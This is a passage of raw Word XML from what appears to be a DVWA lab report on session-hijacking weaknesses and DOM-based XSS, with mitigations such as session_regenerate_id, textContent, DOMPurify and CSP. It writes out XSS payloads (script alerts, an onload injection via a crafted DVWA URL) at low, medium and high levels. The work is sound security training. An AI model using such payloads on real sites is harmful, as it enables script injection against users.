      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DC9A407" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D1C2E7D" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F11F8F5" w14:textId="4FF5847C" w:rsidR="0055184D" w:rsidRDefault="0055184D" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="0055184D">
        <w:t>Decrypt_MD5_Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C118907" w14:textId="41E91A60" w:rsidR="0055184D" w:rsidRDefault="0055184D" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="583DF74D" wp14:editId="6AE7195D">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6030068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2165" w14:textId="547C8C3B" w:rsidR="0055184D" w:rsidRDefault="0055184D" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="0055184D">
        <w:t>Copy_Another_Session_Hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF06493" w14:textId="37433FF2" w:rsidR="0055184D" w:rsidRDefault="0055184D" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="563B43B6" wp14:editId="3BA959CE">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4729035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A6E3" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2310F537" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699F56E9" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6906DA" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C1ED094" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297B9717" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697E0FEA" w14:textId="651DC5CA" w:rsidR="0055184D" w:rsidRDefault="0055184D" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="0055184D">
        <w:t>Decrypt_MD5_Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2D3EA9" w14:textId="1254580C" w:rsidR="0055184D" w:rsidRPr="0055184D" w:rsidRDefault="0055184D" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="424D891A" wp14:editId="43C019C4">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15247258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5F10" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc198745940"/>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="600C955F" w14:textId="77777777" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F25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58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F2587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Use Strong, Random Session IDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCB3A59" w14:textId="77777777" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587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587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use secure random functions (e.g., openssl_random_pseudo_bytes, UUIDv4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588A4431" w14:textId="77777777" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F25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58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F2587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Regenerate Session ID on Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B67002A" w14:textId="77777777" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587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587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Prevent session fixation attacks by rotating IDs after login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497E2878" w14:textId="77777777" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384ABF95" w14:textId="77777777" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>session_regenerate_id(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A49637" w14:textId="77777777" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F25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58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F2587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Invalidate Old Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132382B7" w14:textId="77777777" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587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587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Set expiration, use session timeout, and invalidate on logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545A6BF0" w14:textId="77777777" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F25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58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F2587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Use Secure Cookie Flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEBBEA4" w14:textId="77777777" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587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587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Set HttpOnly, Secure, and SameSite flags on cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFD5500" w14:textId="77777777" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F25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58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F2587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Do Not Accept External Session IDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB2960D" w14:textId="77777777" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587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587">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Do not honor attacker-controlled PHPSESSID in URL or headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C94F358" w14:textId="77777777" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F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F7178" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRPr="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B"/>
    <w:p w14:paraId="630E16AB" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9D4075" w14:textId="48632FFD" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc198745941"/>
      <w:r>
        <w:t>XSS DOM</w:t>
      </w:r>
      <w:r w:rsidR="009036BC">
        <w:t>-Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="59C5EFEC" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc198745942"/>
      <w:r>
        <w:t>Intro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="3BA1FBCE" w14:textId="34C6987D" w:rsidR="00B87EB2" w:rsidRP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  <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">While testing the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DOM-based Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability in DVWA, I identified a flaw where the JavaScript code on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>client-side</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly reflects or evaluates user-controlled input from the URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>without sanitization</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. This allowed me to execute arbitrary JavaScript in the victim’s browser by manipulating the DOM environment — without sending the payload to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19922985" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc198745943"/>
      <w:r>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="2CA86B1B" w14:textId="230670EE" w:rsidR="00B87EB2" w:rsidRPr="00B87EB2" w:rsidRDefault="00B87EB2" w:rsidP="00B87EB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dom_XSS_Scrpt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2985C9" w14:textId="26567A01" w:rsidR="00B87EB2" w:rsidRDefault="00B87EB2" w:rsidP="00B87EB2">
      <w:r>
        <w:t xml:space="preserve">Payload= </w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EB2">
        <w:t>&lt;script&gt;alert('DOM XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D0E60B" w14:textId="13BFAB78" w:rsidR="00B87EB2" w:rsidRPr="00B87EB2" w:rsidRDefault="00B87EB2" w:rsidP="00B87EB2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1092FBDA" wp14:editId="1F0E3002">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20979055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A5AA" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc198745944"/>
      <w:r>
        <w:t>Med</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="7A7F3F7C" w14:textId="77777777" w:rsidR="00B87EB2" w:rsidRPr="00B87EB2" w:rsidRDefault="00B87EB2" w:rsidP="00B87EB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dom_XSS_Scrpt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199B0958" w14:textId="109CF744" w:rsidR="00B87EB2" w:rsidRDefault="00B87EB2" w:rsidP="00B87EB2">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload= </w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EB2">
        <w:t>http://127.0.0.1/DVWA/vulnerabilities/xss_d/?default=English&lt;/select&gt;&lt;body onload=alert('XSS')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F487437" w14:textId="4F012016" w:rsidR="00B87EB2" w:rsidRPr="00B87EB2" w:rsidRDefault="00B87EB2" w:rsidP="00B87EB2">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="558EAB00" wp14:editId="31DDA4F6">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14499099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3622" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc198745945"/>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="0FD402F5" w14:textId="77777777" w:rsidR="00B87EB2" w:rsidRDefault="00B87EB2" w:rsidP="00B87EB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dom_XSS_Scrpt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A818460" w14:textId="645C3B03" w:rsidR="00B87EB2" w:rsidRDefault="00B87EB2" w:rsidP="00B87EB2">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload= </w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#&lt;script&gt;alert('DOMXSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C15788" w14:textId="1C9B3137" w:rsidR="00B87EB2" w:rsidRPr="00B87EB2" w:rsidRDefault="00B87EB2" w:rsidP="00B87EB2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31D35C7C" wp14:editId="44CE1A8E">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14593877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AC36" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRPr="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc198745946"/>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="2A644107" w14:textId="3A2C8A64" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00B87E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00A36" w14:textId="77777777" w:rsidR="00B87EB2" w:rsidRPr="00B87EB2" w:rsidRDefault="00B87EB2" w:rsidP="00B87E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EB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B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Avoid innerHTML, use textContent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F567FBC" w14:textId="55C9898F" w:rsid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  <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3E874B" w14:textId="741A4859" w:rsidR="00B87EB2" w:rsidRP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  <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>document.getElementById("lang").textContent = language;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD927C7" w14:textId="77777777" w:rsidR="00B87EB2" w:rsidRPr="00B87EB2" w:rsidRDefault="00B87EB2" w:rsidP="00B87E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EB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B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Sanitize Input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D7EDD6" w14:textId="77777777" w:rsidR="00B87EB2" w:rsidRP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  <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use client-side libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DOMPurify</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to sanitize dynamic input before injecting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECBFDFD" w14:textId="77777777" w:rsidR="00B87EB2" w:rsidRP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  <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5CC07D" w14:textId="77777777" w:rsidR="00B87EB2" w:rsidRP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  <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>var clean = DOMPurify.sanitize(userInput);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745128AA" w14:textId="77777777" w:rsidR="00B87EB2" w:rsidRPr="00B87EB2" w:rsidRDefault="00B87EB2" w:rsidP="00B87E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EB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B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Don’t Trust document.URL, location.hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6891F6DE" w14:textId="77777777" w:rsidR="00B87EB2" w:rsidRP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  <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use safe, validated routing parameters for dynamic content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B89F41" w14:textId="77777777" w:rsidR="00B87EB2" w:rsidRPr="00B87EB2" w:rsidRDefault="00B87EB2" w:rsidP="00B87E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EB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B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Use Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC25D13" w14:textId="77777777" w:rsidR="00B87EB2" w:rsidRP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  <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CSP headers help block inline scripts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E79814A" w14:textId="77777777" w:rsidR="00B87EB2" w:rsidRP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  <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAE96F6" w14:textId="77777777" w:rsidR="00B87EB2" w:rsidRP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  <w:r w:rsidRPr="00B87EB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Content-Security-Policy: default-src 'self';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4860CB" w14:textId="77777777" w:rsidR="00B87EB2" w:rsidRPr="00B87EB2" w:rsidRDefault="00B87EB2" w:rsidP="00B87E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5ACF1" w14:textId="20A98206" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B"/>
    <w:p w14:paraId="21EDEA49" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE079B2" w14:textId="3B50D765" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc198745947"/>
      <w:r>
        <w:t>XSS Reflected</w:t>
      </w:r>
      <w:r w:rsidR="009036BC">
        <w:t>-Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="410876AB" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc198745948"/>
      <w:r>
        <w:t>Intro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="177BD713" w14:textId="77777777" w:rsidR="00D91AFC" w:rsidRPr="00D91AFC" w:rsidRDefault="00D91AFC" w:rsidP="00D91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1A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uring testing of the </w:t>
      </w:r>
